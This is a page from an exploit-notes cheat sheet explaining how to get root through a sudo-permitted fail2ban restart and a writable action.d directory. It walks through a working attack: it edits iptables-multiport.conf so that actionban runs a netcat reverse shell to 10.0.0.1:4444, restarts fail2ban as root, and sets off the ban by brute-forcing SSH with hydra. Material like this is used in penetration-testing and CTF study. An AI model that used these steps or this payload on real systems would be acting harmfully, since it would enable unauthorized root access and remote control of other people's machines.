# Sudo Fail2ban Privilege Escalation

**Fail2ban** is an intrusion prevention software framework.\
It prevents against brute force attacks.

### [Investigation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#investigation) <a href="#investigation" id="investigation"></a>

```sh
sudo -l

(root) NOPASSWD: /etc/init.d/fail2ban restart
Copied!
```

If we can execute **"fail2ban"** as root, we can gain access to privileges by modifying the configuration file.\
We need to check if the config file is writable.

```sh
find /etc -writable -ls 2>/dev/null

4 drwxrwx--- 2 root security  4096 Oct 16 08:57 /etc/fail2ban/action.d
Copied!
```

Look inside of **"/etc/fail2ban/jail.conf"** to know more about how fail2ban is configured.

```sh
less /etc/fail2ban/jail.conf

# ---------------------------------------------

# output

...
# "bantime" is the number of seconds that a host is banned.
bantime  = 10s

# A host is banned if it has generated "maxretry" during the last "findtime"
# seconds.
findtime  = 10s

# "maxretry" is the number of failures before a host get banned.
maxretry = 5
...
Copied!
```

<br>

### [Exploitation](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#exploitation) <a href="#exploitation" id="exploitation"></a>

#### [1. Modify the Configuration File](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#1.-modify-the-configuration-file) <a href="#id-1.-modify-the-configuration-file" id="id-1.-modify-the-configuration-file"></a>

For privilege escalation, we need to update the **"iptables-multiport.conf"**.\
Specifically, insert a payload to one of the following values.

* **actionstart**
* **actionstop**
* **actioncheck**
* **actionban**
* **actionunban**

Here update the value of **actionban** which triggers ban on multiple login attempts.\
Copy **iptables-multiport.conf** to the current user's home directory.

```sh
ls -al /etc/fail2ban/action.d/iptables-multiport.conf
# copy this file into the home directory for editing the content
cp /etc/fail2ban/action.d/iptables-multiport.conf ~
Copied!
```

Now modify the file.

```sh
vim ~/iptables-multiport.conf
Copied!
```

We insert a reverse shell payload into the **actionban**.

```sh
actionban = /usr/bin/nc 10.0.0.1 4444 -e /bin/bash
Copied!
```

Then move back the config file to the original one.

```sh
mv ~/iptables-multiport.conf /etc/fail2ban/action.d/iptables-multiport.conf
Copied!
```

To apply the new configuration, restart it as root.

```sh
sudo /etc/init.d/fail2ban restart
Copied!
```

#### [2. Trigger the Action](https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/sudo/sudo-fail2ban-privilege-escalation/#2.-trigger-the-action) <a href="#id-2.-trigger-the-action" id="id-2.-trigger-the-action"></a>

Start a listener in local machine.

```sh
nc -lvnp 4444
Copied!
```

Try to login with the wrong passwords multiple times until we will get banned.\
So that to, **hydra** is useful.

```sh
hydra -l root -P passwords.txt <target-ip> ssh
Copied!
```

After a short time, you will get a root shell via listener.